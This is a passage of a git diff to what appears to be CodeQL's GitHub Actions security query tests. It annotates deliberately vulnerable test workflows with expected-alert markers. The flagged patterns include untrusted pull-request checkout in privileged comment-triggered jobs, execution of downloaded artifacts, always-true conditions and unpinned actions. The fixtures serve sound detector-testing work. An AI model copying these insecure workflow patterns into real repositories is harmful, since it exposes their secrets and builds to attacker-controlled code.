Kickoff run + - name: Kickoff run # $ Alert[actions/untrusted-checkout-toctou/critical] if: contains(github.event.comment.body, '/kickoff') env: BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} - - name: Set latest commit status as ${{ job.status }} + - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index da66ff822a3..cf212950f1e 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,3 +1,14 @@ +#select +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | @@ -96,14 +107,3 @@ edges | .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | -#select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref index f924f8fe750..c4a686750f3 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -1 +1,2 @@ -Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +query: Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref index 6284c786b3a..67d2bf06c39 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -1 +1,2 @@ -Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +query: Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index bbbcc5aaa79..e3b1c4047f8 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -16,7 +16,7 @@ jobs: ${{ 1 == 2 || 3 == 4 - }} + }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ 1 == 2 }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ 1 == 2 }} + if: ${{ 1 == 1 }} ${{ 1 == 2 }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ 1 == 2 || - 3 == 4 }} + 3 == 4 }} # $ Alert[actions/if-expression-always-true/high] - name: Test 9 if: '${{ 1 == 2 }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{1 == 2 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ 1 == 2 }}" + if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ 1 == 2 }}" + if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || 1 == 2 - )}} + )}} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || 1 == 2 - )}} + )}} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.event_name }} == 'foo' + if: ${{ github.event_name }} == 'foo' # $ Alert[actions/if-expression-always-true/high] run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' # $ Alert[actions/if-expression-always-true/high] run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" # $ Alert[actions/if-expression-always-true/high] run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} + github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/high] run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml index 8b863037e29..10688938a01 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -16,7 +16,7 @@ jobs: ${{ github.actor == "foo" || 3 == 4 - }} + }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ github.actor == "foo" }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ github.actor == "foo" || - 3 == 4 }} + 3 == 4 }} # $ Alert[actions/if-expression-always-true/critical] - name: Test 9 if: '${{ github.actor == "foo" }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{ github.actor == 111 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ github.actor == 111 }}" + if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ github.actor == 111 }}" + if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || github.actor == "foo" - )}} + )}} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || github.actor == "foo" - )}} + )}} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.actor }} == 'foo' + if: ${{ github.actor }} == 'foo' # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ github.actor }} != "" + if: ${{ github.actor }} != "" # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.actor == 'foo' && - github.event.workflow_run.conclusion == 'success' }} + github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/critical] run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref index 823f802a70f..0c665471caf 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -1 +1,2 @@ -Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql +query: Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref index f12135bd1b8..546bb9dd0c9 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -1 +1,2 @@ -Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql +query: Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index cd4f0fe660a..47151cec6de 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -8,6 +8,6 @@ runs: with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 - - run: echo "foo" + - run: echo "foo" # $ Alert[actions/untrusted-checkout/critical] shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml index 4241647d3e1..ad2a67b14bb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | + - run: | # $ Alert[actions/artifact-poisoning/critical] Alert[actions/unversioned-immutable-action] mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml index 0c205952102..ac4364695ee 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | + - run: | # $ Alert[actions/unversioned-immutable-action] mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip -d /tmp/artifacts shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml index 782505cc698..db50d733137 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml @@ -2,5 +2,5 @@ name: Composite unpinned tag test runs: using: "composite" steps: - - uses: foo/bar@v2 + - uses: foo/bar@v2 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml index 08a25646d6a..369412a9c4d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml @@ -16,11 +16,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml index 7eaee9fa6d3..42322833ce7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -8,12 +8,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - id: pr_number + - id: pr_number # $ Alert[actions/artifact-poisoning/critical] run: | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) - echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml index f8d3736dba5..44e8a18d733 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -29,13 +29,13 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip sonarcloud-data.zip -d sonarcloud-data ls -a sonarcloud-data - name: Run command run: - ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index aa884b7eca7..953d06f55c7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -29,12 +29,12 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip sonarcloud-data.zip ls -a sonarcloud-data - name: Run command run: - python foo/x.py + python foo/x.py # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index e73548895d3..81f42aa335b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -10,14 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml path: foo - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - sh foo/cmd + sh foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index ac970fff840..ca69571fab2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -10,12 +10,12 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 + - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: name: artifact_name workflow: wf.yml - - name: Run command - run: sh cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: sh cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml index 0e7c6f97cf5..d08b18147fe 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -12,11 +12,11 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Alert[actions/artifact-poisoning/critical] run: | unzip artifact_name.zip -d foo - name: Run command - run: ./foo/cmd + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml index 7a837ee42d2..a573db866bd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip artifact_name.zip -d bar - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml index 39ec063c7b6..b40091d7808 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Run command + - name: Run command # $ Alert[actions/artifact-poisoning/critical] run: | - ./bar/cmd + ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml index 905a4eaccb1..b4319fd42f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -13,13 +13,13 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/artifact-poisoning/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml index afa3e15132e..645fe636d3e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip -d "foo" "$name.zip" done - - name: Run command - run: ./foo/cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index d3100d46edc..24fef012e0e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip "$name.zip" done - - name: Run command - run: ./cmd + - name: Run command # $ Alert[actions/artifact-poisoning/critical] + run: ./cmd # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml index 8cb380ae043..4430b91fba9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -7,12 +7,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 + uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Use artifact + - name: Use artifact # $ Alert[actions/artifact-poisoning/critical] run: | - sed -f config foo.md > bar.md + sed -f config foo.md > bar.md # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 399adf3dff7..5a6bf1d6225 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -11,7 +11,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] bash script.sh - uses: actions/upload-artifact@v4 with: @@ -28,4 +28,4 @@ jobs: - uses: actions/download-artifact@v4.0.0 with: name: results - - run: python test.py + - run: python test.py # $ Alert[actions/artifact-poisoning/critical] Alert[actions/artifact-poisoning/path-traversal] Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml index 